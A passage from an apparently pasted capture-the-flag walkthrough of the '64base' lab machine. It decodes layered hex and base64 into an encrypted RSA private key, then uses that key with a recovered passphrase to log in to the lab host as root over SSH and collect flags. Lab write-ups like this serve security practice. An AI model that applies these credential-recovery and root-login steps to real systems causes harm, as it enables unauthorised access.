325a714d4546326330746d636d4e574c327834595663725357313562574d7854566870536b316962554e360a62455233436c52425632316863577453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d517a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b4d486f7964444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c365633527964677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d465649546b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a65464671547a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a57465a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a53444675626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65466c7a65557731656b6459546e703563566f3053533950547a644e5a575179616a4248656a426e4d6a4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f4535705667707955334a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a59323530436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e4764454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d556e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e654774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e5647397064466f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a57566f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a734d32303452335a6d4e7a464b4e6a4a4753484534646d6f4b63557068626c4e720a4f4445334e586f77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f31625842444b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d56424c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b744c5330744c516f3d0a
  489.  
  490. hex again:
  491. LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRF
  492. Sy1JbmZvOiBBRVMtMTI4LUNCQyw2MjFBMzhBQUQ0RTlGQUEzNjU3Q0EzODg4RDlCMzU2QwoKbUR0
  493. UnhJd2g0MFJTTkFzMitsTlJIdlM5eWhNK2VheHhVNXlyR1BDa3JiUVcvUmdQUCtSR0pCejlWclRr
  494. dll3NgpZY091WWVaTWpzNGZJUG43Rlp5Smd4R0hoU3hRb3hWbjlrRGt3bnNNTkRpcnRjb0NPazlS
  495. REFHNWV4OXg0VE16CjhJbERCUXE1aTlZemo5dlBmemVCRFpkSXo5RHcyZ24yU2FFZ3U1emVsKzZI
  496. R09iRjhaaDNNSWNoeThzMVhyRTAKa3ZMS0kyNTJteld3NGtiU3M5K1FhV3loMzRrOEpJVnp1YzFR
  497. Q3liejVXb1U1WTU2RzZxMVJkczBiY1ZxTFVzZQpNU3pLazNtS2FXQXlMWGxvN0xubXFxVUZLSG5k
  498. QkUxU2hQVlZpNGIwR3lGSUxPT3Z0bXZGYjQremh1NmpPV1lICmsyaGRDSE5TdCtpZ2d5OWhoM2ph
  499. RWdVblNQWnVFN05Kd0RZYTdlU0RhZ0wxN1hLcGttMllpQlZyVVh4Vk1ub2IKd1hSZjVCY0dLVTk3
  500. eGRvclYyVHEraDlLU2xaZTc5OXRyVHJGR05lMDV2eERyaWo1VXQyS2NReCs5OEs4S3BXTApndUpQ
  501. UlBLR2lqbzk2SERHYzNMNVlzeE9iVmcrL2ZqMEF2c0tmcmNWL2x4YVcrSW15bWMxTVhpSk1ibUN6
  502. bER3ClRBV21hcWtSRkR5QTFIVXZ0dlNlVnFTMS9IamhEdzlkNEtzdnNqa2p2eWVRVHNzZnNkR2NV
  503. MGhEa1h3Uldzc2QKMmQzRytOam0xUjVaTE5nUmxOcFZHamhLQzRBc2ZYUzNKMHoydDNCUE05Wk9C
  504. TUJlOUR4OHptNXhGWTl6V3RydgpBR3ByMEJoOEtRd21walFVYzFhZnNxYVFYMFVITkxYVDFaT1dL
  505. amc0U0EzWEM5ZENFeUZxMFNJeFFqTzlMR0NHCjRRNW5jZlVobXZ0cXl1dENsbDJkWFBzWFZEZTRl
  506. b0QxQ2t2Sk5EWTNLUFcrR2tOOUwrOUNQeTgrRE51bkZJd3gKK1QrKzdRZy91UFhLcTRNNjFJUTgw
  507. MzRVaHVSV1M0VHFQOWF6WDNDRzlMeW9pQjZWYktPZUR3TjhhaWxMS1pCcwpmWTlRNkFNMXN5bGl6
  508. SDFubnhLT3RaUVd1cnhqR0pCSXM2MnRlbE1rYXM5eU5NazNMdTdxUkg2c3dPOXNkVEJpCitqMHg0
  509. dURaakpjZ01YeGZiMHc1QTY0bFlGc01SekZqN1hkZnkxOStNZThKRWhROEtOWER3UUtEeVVMRk9U
  510. c3oKMTNWZkJOeFlzeUw1ekdYTnp5cVo0SS9PTzdNZWQyajBHejBnMjFpSEEvMDZtcnMyY2xkczZT
  511. VUJHRXZuOE5pVgpyU3JINnZFczRTemcweDhkZEd2UTBxVzF2TWtUUnUzT3kvZTEwRjc0NXhETUFU
  512. S1JsS1o2cllITUN4SjNJY250CkV6ME9NWFlkQzZDaUYvSVd0Z2RVK2hLeXZzNHNGdENCY2xTYWdt
  513. RFRKMmtaZHU0UlJ3WVZWNm9JTno5YnBPdkUKUngzSFVxZm5LU2hydXpNOVpraUlrdVNmUnRmaU12
  514. YlR6ZmZKVFM0YzQ4Q081WC9SZUYvQWFNeGtiU2RFT0ZzSQpGdjlYZGk5U2ROdXhHSEUyRzRIdkpk
  515. SXByRlVyVlNwU0k4MHdncmIyNDVzdzZnVG9pdFo5MGhKNG5KNWF5N0FHCllpYWE1bzc4NzcvZnc2
  516. WVovMlUzQURkaVNPQm0raGpWMkpWeHJveVVYYkc1ZGZsM204R3ZmNzFKNjJGSHE4dmoKcUphblNr
  517. ODE3NXowYmpyWFdkTEczRFNsSUppc2xQVyt5RGFmN1lCV
  518.  
  519. root@kali:~/ctf/x64# cat hex.txt | xxd -r -p
  520. LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRF
  521. Sy1JbmZvOiBBRVMtMTI4LUNCQyw2MjFBMzhBQUQ0RTlGQUEzNjU3Q0EzODg4RDlCMzU2QwoKbUR0
  522. UnhJd2g0MFJTTkFzMitsTlJIdlM5eWhNK2VheHhVNXlyR1BDa3JiUVcvUmdQUCtSR0pCejlWclRr
  523. dll3NgpZY091WWVaTWpzNGZJUG43Rlp5Smd4R0hoU3hRb3hWbjlrRGt3bnNNTkRpcnRjb0NPazlS
  524. REFHNWV4OXg0VE16CjhJbERCUXE1aTlZemo5dlBmemVCRFpkSXo5RHcyZ24yU2FFZ3U1emVsKzZI
  525. R09iRjhaaDNNSWNoeThzMVhyRTAKa3ZMS0kyNTJteld3NGtiU3M5K1FhV3loMzRrOEpJVnp1YzFR
  526. Q3liejVXb1U1WTU2RzZxMVJkczBiY1ZxTFVzZQpNU3pLazNtS2FXQXlMWGxvN0xubXFxVUZLSG5k
  527. QkUxU2hQVlZpNGIwR3lGSUxPT3Z0bXZGYjQremh1NmpPV1lICmsyaGRDSE5TdCtpZ2d5OWhoM2ph
  528. RWdVblNQWnVFN05Kd0RZYTdlU0RhZ0wxN1hLcGttMllpQlZyVVh4Vk1ub2IKd1hSZjVCY0dLVTk3
  529. eGRvclYyVHEraDlLU2xaZTc5OXRyVHJGR05lMDV2eERyaWo1VXQyS2NReCs5OEs4S3BXTApndUpQ
  530. UlBLR2lqbzk2SERHYzNMNVlzeE9iVmcrL2ZqMEF2c0tmcmNWL2x4YVcrSW15bWMxTVhpSk1ibUN6
  531. bER3ClRBV21hcWtSRkR5QTFIVXZ0dlNlVnFTMS9IamhEdzlkNEtzdnNqa2p2eWVRVHNzZnNkR2NV
  532. MGhEa1h3Uldzc2QKMmQzRytOam0xUjVaTE5nUmxOcFZHamhLQzRBc2ZYUzNKMHoydDNCUE05Wk9C
  533. TUJlOUR4OHptNXhGWTl6V3RydgpBR3ByMEJoOEtRd21walFVYzFhZnNxYVFYMFVITkxYVDFaT1dL
  534. amc0U0EzWEM5ZENFeUZxMFNJeFFqTzlMR0NHCjRRNW5jZlVobXZ0cXl1dENsbDJkWFBzWFZEZTRl
  535. b0QxQ2t2Sk5EWTNLUFcrR2tOOUwrOUNQeTgrRE51bkZJd3gKK1QrKzdRZy91UFhLcTRNNjFJUTgw
  536. MzRVaHVSV1M0VHFQOWF6WDNDRzlMeW9pQjZWYktPZUR3TjhhaWxMS1pCcwpmWTlRNkFNMXN5bGl6
  537. SDFubnhLT3RaUVd1cnhqR0pCSXM2MnRlbE1rYXM5eU5NazNMdTdxUkg2c3dPOXNkVEJpCitqMHg0
  538. dURaakpjZ01YeGZiMHc1QTY0bFlGc01SekZqN1hkZnkxOStNZThKRWhROEtOWER3UUtEeVVMRk9U
  539. c3oKMTNWZkJOeFlzeUw1ekdYTnp5cVo0SS9PTzdNZWQyajBHejBnMjFpSEEvMDZtcnMyY2xkczZT
  540. VUJHRXZuOE5pVgpyU3JINnZFczRTemcweDhkZEd2UTBxVzF2TWtUUnUzT3kvZTEwRjc0NXhETUFU
  541. S1JsS1o2cllITUN4SjNJY250CkV6ME9NWFlkQzZDaUYvSVd0Z2RVK2hLeXZzNHNGdENCY2xTYWdt
  542. RFRKMmtaZHU0UlJ3WVZWNm9JTno5YnBPdkUKUngzSFVxZm5LU2hydXpNOVpraUlrdVNmUnRmaU12
  543. YlR6ZmZKVFM0YzQ4Q081WC9SZUYvQWFNeGtiU2RFT0ZzSQpGdjlYZGk5U2ROdXhHSEUyRzRIdkpk
  544. SXByRlVyVlNwU0k4MHdncmIyNDVzdzZnVG9pdFo5MGhKNG5KNWF5N0FHCllpYWE1bzc4NzcvZnc2
  545. WVovMlUzQURkaVNPQm0raGpWMkpWeHJveVVYYkc1ZGZsM204R3ZmNzFKNjJGSHE4dmoKcUphblNr
  546. ODE3NXowYmpyWFdkTEczRFNsSUppc2xQVyt5RGFmN1lCVll3V1IrVEExa0M2aWVJQTV0VTNwbi9J
  547. Mwo2NFo1bXBDK3dxZlR4R2dlQ3NnSWs5dlNuMnAvZWV0ZEkzZlFXOFdYRVJiRGV0MVVMSFBxdElp
  548. N1NaYmo4ditQCmZuSExRdkV3SXMrQmYxQ3BLMUFrWmVVTVJFUWtCaERpNzJIRmJ3MkcvenF0aS9Z
  549. ZG5xeEF5bDZMWnpJZVFuOHQKL0dqNGthckoxaU05SWYzOWRNNU9hQ1ZaUi9UT0JWYVI4bXJQN1Z0
  550. Sm9yOWplSDJ0RUwwdG9FcVdCMVBLMHVYUAotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=
  551.  
  552. cat hex.txt | base64 -d -i
  553. -----BEGIN RSA PRIVATE KEY-----
  554. Proc-Type: 4,ENCRYPTED
  555. DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C
  556.  
  557. mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
  558. YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
  559. 8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
  560. kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
  561. MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
  562. k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
  563. wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
  564. guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
  565. TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
  566. 2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
  567. AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
  568. 4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
  569. +T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
  570. fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
  571. +j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
  572. 13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
  573. rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
  574. Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
  575. Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
  576. Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
  577. Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
  578. qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
  579. 64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
  580. fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
  581. /Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
  582. -----END RSA PRIVATE KEY-----
  583.  
  584. saved to 64baseprivate.key
  585.  
  586. ssh -i 64baseprivate.key root@192.168.1.76 -p62964
  587.  
  588. Enter passphrase for key '64baseprivate.key':
  589.  
  590. looking at the image that was in "./admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}" its luke saying use the force
  591. Password is "usetheforce" for root
  592.  
  593. Last login: Tue Dec 6 05:40:07 2016 from 172.16.0.18
  594.  
  595. flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
  596. root@64base:~#
  597.  
  598. root@64base:~# ls -lash
  599. total 32K
  600. 4.0K drwx------ 3 root root 4.0K Dec 6 05:40 .
  601. 4.0K drwxr-xr-x 22 root root 4.0K Dec 6 03:00 ..
  602. 0 -rw------- 1 root root 0 Apr 9 00:00 .bash_history
  603. 4.0K -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
  604. 4.0K -rw-r--r-- 1 root root 592 Dec 6 00:13 .profile
  605. 4.0K -rw-r--r-- 1 root root 66 Dec 5 12:53 .selected_editor
  606. 4.0K drwx------ 2 root root 4.0K Nov 30 08:11 .ssh
  607. 4.0K -rw-r--r-- 1 root root 50 Dec 6 00:19 story
  608. 4.0K -rw------- 1 root root 52 Dec 6 05:40 .Xauthority
  609. root@64base:~# cat story
  610. https://asciinema.org/a/bmm6115k884o4ix0c7u38ylet
  611. root@64base:~#
  612.  
  613.  
  614. root@64base:~# base64
  615. ^C
  616. root@64base:~# echo NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK | base64 -d
  617. 4e546b325a4451324e324531595455304e546b7a4d4451354e444d7a4d545a694e446b304d7a4d354d7a49314f5455344e446b334e6a59794e44637a4f545a684e546b314e7a63334e7a5930597a5a6b4e7a677a4d5459784d7a49314e6a4d344e6a49304e7a55324e3245324d7a63354d7a55334f5456684e5463304e6a637a4e444d324e7a4e6b4d32517759516f3d0a
  618. root@64base:~# echo 4e546b325a4451324e324531595455304e546b7a4d4451354e444d7a4d545a694e446b304d7a4d354d7a49314f5455344e446b334e6a59794e44637a4f545a684e546b314e7a63334e7a5930597a5a6b4e7a677a4d5459784d7a49314e6a4d344e6a49304e7a55324e3245324d7a63354d7a55334f5456684e5463304e6a637a4e444d324e7a4e6b4d32517759516f3d0a | xxd -r -p
  619. NTk2ZDQ2N2E1YTU0NTkzMDQ5NDMzMTZiNDk0MzM5MzI1OTU4NDk3NjYyNDczOTZhNTk1Nzc3NzY0YzZkNzgzMTYxMzI1NjM4NjI0NzU2N2E2Mzc5MzU3OTVhNTc0NjczNDM2NzNkM2QwYQo=
  620. root@64base:~# echo NTk2ZDQ2N2E1YTU0NTkzMDQ5NDMzMTZiNDk0MzM5MzI1OTU4NDk3NjYyNDczOTZhNTk1Nzc3NzY0YzZkNzgzMTYxMzI1NjM4NjI0NzU2N2E2Mzc5MzU3OTVhNTc0NjczNDM2NzNkM2QwYQo= | base64 -d
  621. 596d467a5a5459304943316b49433932595849766247396a595777764c6d7831613256386247567a637935795a57467343673d3d0a
  622. root@64base:~# echo 596d467a5a5459304943316b49433932595849766247396a595777764c6d7831613256386247567a637935795a57467343673d3d0a | xxd -r -p
  623. YmFzZTY0IC1kIC92YXIvbG9jYWwvLmx1a2V8bGVzcy5yZWFsCg==
  624. root@64base:~# echo YmFzZTY0IC1kIC92YXIvbG9jYWwvLmx1a2V8bGVzcy5yZWFsCg== | base64 -d
  625. base64 -d /var/local/.luke|less.real
  626.  
  627.  
  628. __ __ _ _ _____
  629. \ \ / / | | | | __ \
  630. \ \ /\ / /__| | | | | | | ___ _ __ ___
  631. \ \/ \/ / _ \ | | | | | |/ _ \| '_ \ / _ \
  632. \ /\ / __/ | | | |__| | (_) | | | | __/
  633. __ \/ _\/ \___|_|_|_|_____/ \___/|_|_|_|\___| _
  634. \ \ / / | __ \(_) | | |_ _| | | |
  635. \ \_/ /__ _ _ | | | |_ __| | | | | |_| |
  636. \ / _ \| | | | | | | | |/ _` | | | | __| |
  637. | | (_) | |_| | | |__| | | (_| | _| |_| |_|_|
  638. |_|\___/ \__,_| |_____/|_|\__,_| |_____|\__(_)
  639.  
  640. _____ _ _ _ __ __ __ _ ___ _ __ ___ __ __ __ _ ___ _ _ __ _________
  641. %=x%= | |V| |_)|_ |_) | |_| | |_) |_| (_ |_ |_) | |_| |\| (_ %=x%=x%=x
  642. ~~~~~ | | | | |_ | \ | | | |_ |_) | | __) |_ | |_ | | | | __) ~~~~~~~~~
  643. LS
  644. .-. .-.
  645. .=========. E x t e r i o r , A e r i a l V i e w
  646. ||.-.7.-.|| -----------------------------------------
  647. ||`-' `-'||
  648. `========='
  649. `-'| |`-'8 1 .............. Sensor Suite Tower
  650. ______ |9| ______ 2 ... Heavy Twin Turbolaser Turrets
  651. / /\__| |__/\ \ 3 ............. Heavy Laser Turrets
  652. / \_ / / |_| \ \ _/ \ 4 ....... TIE Fighter Launch Chutes
  653. /___(\\\/ \///)___\ 5 ............... Heavy Blast Doors
  654. \____\\`==========='//____/ 6 .................... Guard towers
  655. / '/ .-------. \\ \ 7 ........ Shuttle Landing Platform
  656. __/ //. \`+---+'/ .\\ \__ 8 ........... AT-AT Docking Station
  657. /\ \ ///x`.\|___|/.'x\\\ / /\ 9 ................. Connecting Ramp
  658. / \ \ //`-._//| |\\_.2'\\ / / \
  659. / _.-==='_____//.-=-.\\_____`===-._ \
  660. \ `-===.\-. \ `-=1' / .-/.===-' 3 / The pre-fabricated, multi-function
  661. \ / / \\\ \ \.===./ /4/// \ \ / Imperial garrison base is the back-
  662. \/_/ \\\ | /.---.\ | /// \_\/ bone of the Empire's occupational
  663. \ \\\|/ |_m_| \|/// / forces. These heavily-armoured for-
  664. \_____\=============/_____/ tresses have walls up to 10 meters
  665. /____/// ___ \\\____\ thick to guard against ground
  666. \ (_//\__|||||__/\\_) / assaults, and powerful deflector
  667. \ / \|,,|||||,,|/ \ / shields protect them for air or
  668. \_____| | 5 | 6|_____/ space attacks.
  669. `--' `--'
  670. ____________________________________________________________________________
  671. %=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
  672. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  673.  
  674. Hopefully I didn't leave anything out. I tried a lot of things after flag 5 not realizing the flag's string, was the file name of an image.
  675.  
  676. - DigiP
RAW Paste Data